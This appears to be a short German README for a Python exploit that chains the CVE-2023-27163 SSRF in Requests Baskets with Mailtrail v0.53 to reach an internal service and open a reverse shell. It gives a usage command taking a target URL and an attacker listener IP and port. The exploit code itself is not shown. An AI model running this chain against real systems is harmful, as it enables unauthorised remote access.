
Python-Exploit, der CVE-2023-27163 SSRF in Requests Baskets mit Mailtrail v0.53 verkettet, um interne Dienste weiterzuleiten und eine Reverse Shell auszuführen.
Der folgende Exploit missbraucht die Requests Baskets v1.2.1 SSRF-Schwachstelle, um die intern unter 127.0.0.1:80 laufende Anwendung an die externe Anwendung unter /pwned weiterzuleiten. Sobald die Anwendung Mailtrail v0.53 weitergeleitet wurde, führt sie einen Reverse-Shell-Befehl gegen sie aus, und innerhalb weniger Sekunden sollte der Benutzer eine Reverse Shell auf der Maschine erhalten.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT